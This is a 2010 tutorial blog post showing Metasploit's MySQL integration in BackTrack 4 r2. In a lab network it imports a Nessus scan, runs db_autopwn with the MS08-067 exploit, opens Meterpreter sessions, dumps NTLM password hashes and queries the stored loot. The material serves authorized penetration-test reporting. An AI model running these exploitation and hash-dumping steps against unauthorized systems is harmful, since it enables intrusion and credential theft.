Blog
Nov 21, 2010
Metasploit with MySQL in BackTrack 4 r2
Until the release of BackTrack 4 r2, it was possible to get Metasploit working with MYSQL but it was not an altogether seamless experience. Now, however, Metasploit and MYSQL work together “out of the box” so we thought it would be great to highlight the integration. With the Metasploit team moving away from sqlite3, it is vital to be able to make use of a properly threaded database. There have also been quite a number of additional database commands added to Metasploit and documentation tends to be rather sparse online when it comes to the less “glamorous” side of database management.
7 min read
Until the release of BackTrack 4 r2, it was possible to get Metasploit working with MYSQL but it was not an altogether seamless experience. Now, however, Metasploit and MYSQL work together “out of the box” so we thought it would be great to highlight the integration. With the Metasploit team moving away from sqlite3, it is vital to be able to make use of a properly threaded database. There have also been quite a number of additional database commands added to Metasploit and documentation tends to be rather sparse online when it comes to the less “glamorous” side of database management.
[cc lang=”bash”]root@bt:~# msfconsole
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ — –=[ 635 exploits – 316 auxiliary
+ — –=[ 215 payloads – 27 encoders – 8 nops
=[ svn r11078 updated today (2010.11.19)
msf > db_driver
[*] Active Driver: postgresql
[*] Available: postgresql, mysql, sqlite3[/cc]
We then load the mysql driver, start the mysql service and connect to the database. If the database does not already exist, Metasploit will create it for us.
[cc lang=”bash”]msf > db_driver mysql
[*] Using database driver mysql
msf > /etc/init.d/mysql start
[*] exec: /etc/init.d/mysql start
Starting MySQL database server: mysqld.
Checking for corrupt, not cleanly closed and upgrade needing tables..
msf > db_connect
[*] Usage: db_connect @/
[*] OR: db_connect -y [path/to/database.yml]
[*] Examples:
[*] db_connect user@metasploit3
[*] db_connect user:pass@192.168.0.2/metasploit3
[*] db_connect user:pass@192.168.0.2:1500/metasploit3
msf > db_connect root:toor@127.0.0.1/msf3[/cc]
In order to have some hosts to use as targets and to show the information we can add to the database, we import a previously run Nessus scan using the db_import command. Metasploit will automatically detect the filetype and import it for us.
[cc lang=”bash”]msf > db_import /root/nessus_report_EDB.nessus
[*] Importing ‘Nessus XML (v2)’ data
[*] Importing host 192.168.69.50
[*] Importing host 192.168.69.199
[*] Importing host 192.168.69.175
[*] Importing host 192.168.69.173
[*] Importing host 192.168.69.171
[*] Importing host 192.168.69.146
[*] Importing host 192.168.69.143
[*] Importing host 192.168.69.142
[*] Importing host 192.168.69.141
[*] Importing host 192.168.69.140
[*] Importing host 192.168.69.130
[*] Importing host 192.168.69.110
[*] Importing host 192.168.69.105
[*] Importing host 192.168.69.100
[*] Successfully imported /root/nessus_report_EDB.nessus[/cc]
After the successful import, our database should be populated with a number of hosts. Running db_hosts will query the database and allow us to customize the output.
[cc lang=”bash”]msf > db_hosts -h
Usage: db_hosts [-h|–help] [-u|–up] [-a ] [-c
] [-o output-file ]
-a Search for a list of addresses
-c
Only show the given columns
-h,–help Show this help information
-u,–up Only show hosts which are up
-o Send output to a file in csv format
Available columns: address, address6, arch, comm, comments, created_at, info, mac, name, os_flavor, os_lang, os_name, os_sp, purpose, state, updated_at
msf > db_hosts -c address,mac
Hosts
=====
address mac
——- —
192.168.69.100 00:0C:29:DE:1A:00
192.168.69.105 00:0C:29:9A:FC:E0
192.168.69.110 00:0C:29:69:9C:44
192.168.69.130 00:0C:29:6E:26:BB
192.168.69.140
192.168.69.141 00:0C:29:F3:40:70
192.168.69.142 00:0C:29:57:63:E2
192.168.69.143 00:0C:29:32:29:79
192.168.69.146
192.168.69.171 00:0C:29:EC:23:47
192.168.69.173 00:0C:29:45:7D:33
192.168.69.175 00:0C:29:BB:38:53
192.168.69.199 00:0C:29:58:09:DA
192.168.69.50[/cc]
Far more interesting than IP and MAC addresses are what services are running on our target systems which is what db_services will show us.
[cc lang=”bash”]msf > db_services -h
Usage: db_services [-h|–help] [-u|–up] [-a ] [-r
] [-p
] [-n ]
-a Search for a list of addresses
-c
Only show the given columns
-h,–help Show this help information
-n Search for a list of service names
-p
Search for a list of ports
-r
Only show [tcp|udp] services
-u,–up Only show services which are up
Available columns: created_at, info, name, port, proto, state, updated_at
msf > db_services -c name,port,proto
Services
========
name port proto Host Workspace
—- —- —– —- ———
192.168.69.100 123 udp 192.168.69.100 default
192.168.69.100 135 tcp 192.168.69.100 default
192.168.69.100 137 udp 192.168.69.100 default
192.168.69.100 139 tcp 192.168.69.100 default
192.168.69.100 445 tcp 192.168.69.100 default
192.168.69.100 3389 tcp 192.168.69.100 default
192.168.69.105 123 udp 192.168.69.105 default
…snip…[/cc]
Most interesting of all is the list of vulnerabilities that are mapped to our specific targets as found in the vulnerability scan. The db_vulns command will list the vulnerabilities along with their corresponding reference numbers, if applicable.
[cc lang=”bash”]msf > db_vulns
[*] Time: Sat Nov 20 20:21:37 UTC 2010 Vuln: host=192.168.69.50 name=NSS- refs=
[*] Time: Sat Nov 20 20:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445 proto=tcp name=NSS-26920 refs=CVE-1999-0519,CVE-1999-0520,CVE-2002-1117,BID-494,OSVDB-299
[*] Time: Sat Nov 20 20:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445 proto=tcp name=NSS-26919 refs=CVE-1999-0505
…snip…[/cc]
For the sake of brevity, we will just let db_autopwn exploit the low-hanging fruit for us and only run exploits with at least a “good” rating.
[cc lang=”bash”]msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
msf > db_autopwn -x -e -R good
[*] (1/30 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.69.175:139…
[*] (2/30 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.69.175:139…
…snip…
[*] Meterpreter session 1 opened (192.168.69.140:54342 -> 192.168.69.105:34160) at Sat Nov 20 15:45:24 -0500 2010
[*] Meterpreter session 2 opened (192.168.69.140:53895 -> 192.168.69.100:30423) at Sat Nov 20 15:45:24 -0500 2010
[*] (30/30 [2 sessions]): Waiting on 2 launched modules to finish execution…
[*] (30/30 [2 sessions]): Waiting on 0 launched modules to finish execution…[/cc]
In a brief amount of time, Metasploit has delivered 2 Meterpreter sessions to us.
[cc lang=”bash”]msf > sessions -l
Active sessions
===============
Id Type Information Connection
— —- ———– ———-
1 meterpreter x86/win32 192.168.69.140:54342 -> 192.168.69.105:34160
2 meterpreter x86/win32 NT AUTHORITYSYSTEM @ V-XPSP2-TEMPLAT 192.168.69.140:53895 -> 192.168.69.100:30423[/cc]
Running db_exploited now will list not only the hosts that were exploited but also the port and exploit that was successful against them.
[cc lang=”bash”]msf > db_exploited
[*] Time: Sat Nov 20 20:45:24 UTC 2010 Host Info: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 exploit=exploit/windows/smb/ms08_067_netapi
[*] Time: Sat Nov 20 20:45:24 UTC 2010 Host Info: host=192.168.69.100 port=445 proto=tcp sname=192.168.69.100 exploit=exploit/windows/smb/ms08_067_netapi
[*] Found 2 exploited hosts.[/cc]
Post exploitation is critical and you can frequently make use of credentials gathered to penetrate deeper into a target network. Metasploit has the db_add_cred command that allows you to insert credentials into the database as you come across them during your engagement.
[cc lang=”bash”]msf > sessions -i 1
[*] Starting interaction with 1…
meterpreter > hashdump
Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:616bd5bd6c74fb1e2207c34e6ce1c14f:fc631be480c73a749c15e311b8b877fd:::
lab:1003:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:adc54aedfc47352ef9e20da3dd86ca63:::
meterpreter >
Background session 1? [y/N]
msf > db_add_cred 192.168.69.105 445 Administrator Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
[*] Time: Sat Nov 20 20:54:36 UTC 2010 Credential: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
msf > db_creds
[*] Time: Sat Nov 20 20:54:36 UTC 2010 Credential: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
[*] Found 1 credential.
msf >[/cc]
All of these database features are very powerful and exciting but just as exciting is that your entire session is now available with MYSQL.
[cc lang=”mysql”]root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or g.
Your MySQL connection id is 56
Server version: 5.0.67-0ubuntu6 (Ubuntu)
Type ‘help;’ or ‘h’ for help. Type ‘c’ to clear the buffer.
mysql> use msf3;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+—————————–+
| Tables_in_msf3 |
+—————————–+
| attachments |
| attachments_email_templates |
| campaigns |
| clients |
| creds |
| email_addresses |
| email_templates |
| events |
| exploited_hosts |
| hosts |
| imported_creds |
| loots |
| notes |
| project_members |
| refs |
| report_templates |
| reports |
| schema_migrations |
| services |
| tasks |
| users |
| vulns |
| vulns_refs |
| web_forms |
| web_pages |
| web_sites |
| web_templates |
| web_vulns |
| wmap_requests |
| wmap_targets |
| workspaces |
+—————————–+
31 rows in set (0.00 sec)[/cc]
We can now perform queries to access all of the information gathered on exploited hosts, gathered credentials, and much more.
[cc lang=”mysql”]mysql> select * from exploited_hosts;
+—-+———+————+————–+————————————-+————————————–+———————+———————+
| id | host_id | service_id | session_uuid | name | payload | created_at | updated_at |
+—-+———+————+————–+————————————-+————————————–+———————+———————+
| 1 | 14 | 131 | oc5vd2zl | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp | 2010-11-20 20:45:24 | 2010-11-20 20:45:24 |
| 2 | 15 | 137 | qwtwtqfj | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp | 2010-11-20 20:45:24 | 2010-11-20 20:45:24 |
+—-+———+————+————–+————————————-+————————————–+———————+———————+
2 rows in set (0.00 sec)
mysql> select * from creds;
+—-+————+———————+———————+—————+—————————————————————————————-+——–+——-+———-+———–+————-+
| id | service_id | created_at | updated_at | user | pass | active | proof | ptype | source_id | source_type |
+—-+————+———————+———————+—————+—————————————————————————————-+——–+——-+———-+———–+————-+
| 1 | 131 | 2010-11-20 20:54:36 | 2010-11-20 20:54:36 | Administrator | Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: | 1 | NULL | password | NULL | NULL |
+—-+————+———————+———————+—————+—————————————————————————————-+——–+——-+———-+———–+————-+
1 rows in set (0.00 sec)
mysql>[/cc]
At first glance, database integration is not that compelling but it opens the door for the community to develop customized reporting apps using such a widely used database like MYSQL easing the post-penetration test reporting burden.
For further details on setting up and using the various databases in Metasploit, check out the Using the MSF Database section in Metasploit Unleashed.
Cybersecurity leader resources
Sign up for the Secure Leader and get the latest info on industry trends, resources and best practices for security leaders every other week
Latest from OffSec
Enterprise Security
Red Team vs Blue Team in Cybersecurity
Learn what a red team and blue team in cybersecurity are, pros and cons of both, as well as how they work together.
Dec 13, 2024
13 min read
Enterprise Security
Building a Future-Ready Cybersecurity Workforce: The OffSec Approach to Talent Development
Learn all about our recent webinar “Building a Future-Ready Cyber Workforce: The OffSec Approach to Talent Development”.
Dec 13, 2024
4 min read
Enterprise Security
How to Become the Company Top Cyber Talent Wants to Join
Become the company cybersecurity talent wants to join. Learn how to attract, assess, and retain experts with strategies that set you apart.
Dec 4, 2024
5 min read